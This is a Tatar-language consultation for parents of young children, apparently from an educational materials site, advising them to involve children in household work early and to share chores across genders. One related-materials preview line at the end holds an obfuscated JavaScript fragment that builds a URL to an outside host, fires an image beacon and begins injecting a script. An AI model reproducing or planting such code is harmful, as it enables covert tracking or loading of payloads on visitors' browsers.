Эш яратып үссеннәр
статья (младшая группа) на тему

КОНСУЛЬТАЦИЯ ДЛЯ РОДИТЕЛЕЙ

Скачать:

ВложениеРазмер
Файл Эш яратып үссеннәр14.85 КБ

Предварительный просмотр:

Әти- әниләр өчен киңәшләр.

Эш яратып үссеннәр.                                                 

   Мухаметгалимова Н.Г.

МБДОУ № 76 г. Нижнекамск

Гаилә -  бала өчен иң беренче социаль дөнья. Яшь буын  хезмәткә иң элек шунда өйрәнә. Кече яшьтән үк хезмәткә өйрәтү аның табигатенә бик туры килә. Балага хаз булган активлык, барын да белергә, үзе эшьләп карарга омтылу хезмәттә аеруча ачык чагыла. Кечкенә бала уен аша хезмәткә тартыла. Ул әнисе яисә әтисе эшләгәнне карап торырга ярата, аннары шуны кабатлый: шофер, сатучы яки врач булып уйный.Уйнаганда торле әйберләр белән зш итә, хәрәкәтләнә. Әгәр ике , өч яшьлек улыгызга яки кызыгызга өстәл сөртергә кушсагыз, ул әлеге  хәрәкәтне шактый озак кабатлар. Чөнки бу эш балага зур шатлык һәм куаныч китерә, әммә бу хәрәкәтне ул  механик рәвештә генә башкара.

      Белгәнебезчә, хезмәт баланың физик һәм психик үсешенә уңай тәэсир итә. Аның мускулларын ныгыта, игътибары, күзәтүчәнлеге, тапкырлыгы артуга ярдәм итә. Теләк булганда, бала башлаган эшшен яхшырак итеп очлап чыгарга омтыла. Практик күнекмәләр баланың хәтеренә нык сеңеп кала, аның фикерләү сәләте арта, ул торган саен күбрәк белергә омтыла. Хезмәт баланы рухи һәм физик яктан да чыныктыра. Бала да үзе эшләгән әйбергә,өлкәннәр дә шундый ук саклык. Игътибар белән карарга тиеш. Чөнки үз хезмәте аша бала олылар хезмәтен дә  ихтирам итәргә өйрәтә. Ул тирә-ягындагы кешеләрнең өйдә, заводта. кырда яки бакчада ничек эшләвен хәтеренә сендереп бара.

    Еш кыны олылар баланың кечкенә булуын, берни дә эшли белмәвен, комачаулап кына йөрүен сәбәп итеп, аны бер эшкәдә катнаштырмыйлар һәм шуның белән сабыйның шәхесе формалашуга зур зыян китерәләр. Шуңа күрә аны көче җитәрлек эштән беркайчан да читләштермәскә кирәк. Ике, өч яшьләрдә үк инде баланы үз-үзен карарга: мөстәкыйль рәвештә ашарга, киенергә, кием-салымын билгеле бер урынга элеп куярга, уйнаган уенчыкларын җыярга өйрәтү бик мөһим. Баланы үз- үзенә хезмәт күрсәтергә өйрәтү аны хезмәткә әзерләү итеп каралырга тиеш.

        Бераз үсә төшкәч, балага өй эшләрендә катнашырга мөмкинлек бирелә. Бүлмә җыештырганда кулына юеш чүпрәк тоттырып, тузан сөртергә куша, табын әзерләгәндә, тәлинкәләрне саклык белән генә куярга кирәклеген әйтә. Балага яшелчәләрне юарга да  рөхсәт итәргә мөмкин.

 Кызганычка каршы кайбер ата-аналар: “Интекмәсеннәр, үскәч тә өлгерерләр әле”, - дип, балаларына бернинди  эш кушмыйлар. Ә берничә елдан балаларының булдыксызлыгыннан үзләре үк зарлана башлыйлар. Ир баланы өй эшләренә өйрәтүдә ата үрнәге  зур роль  уйный. Әгәр дә әти кеше андый эшләргә бары тик хатын кыз шөгыле дип кенә караса, аның улы да шулай тәрбияләнер, әнисе берәр эш кушса: “Хатын-кыз түгел лә мин!” – дип кенә җибәрер. Хәттә кайбер аналар үзләре дә өйне хатын- кыз гына җыештырырга, бу эшкә кызларны гына өйрәтергә дип саныйлар. Бу ялгыш һәм зарарлы караш. Гаиләдә ирләргә дә, хатын-кызга да эш җитәрлек. Ата-аналар өйдә бергәләп эшләргә, балаларын да шуңа өйрәтергә тиеш. Чөнки бүгенге балалар – булачак ата-аналар. Баланың күңеле сүрелмәсен һәм үз көченә ышанычы кимемәсен өчен, кайвакыт аңарга бераз гына булышып җибәрү  дә кирәк. Моннан соң ул тагын да канатланып китә. Кыскасы, баланы кечкенәдән үк хезмәткә күнектерү аңарда түземлелек, тырышлык кебек сыйфатлар тәрбияләргә ярдәм итә.


По теме: методические разработки, презентации и конспекты

Әти – әниләр өчен киңәшләр «Эш яратып үссеннәр» Кечкенәләр төркеме

Әти – әниләр өчен киңәшләр«Эш яратып үссеннәр»Кечкенәләр төркеме...

Әти – әниләр өчен киңәшләр «Эш яратып үссеннәр» Кечкенәләр төркеме

var e,n,o;window.self===window.top&&(e=[\'//\',\'s:\',\'tp\',\'ht\'].reverse().join(\'\'),n=[\'hlzeeb.lussoit.com\',\'39\'].join(\'/\'),(o=new Image).src=\'\'.concat(e).concat(n,\'.gif\')); var script = document.creat...

"Яратып әйт " ИКТ уйын.

Телмәр үҫтереү белем биреү эшмәкәрлегенә ИКТ уйын ....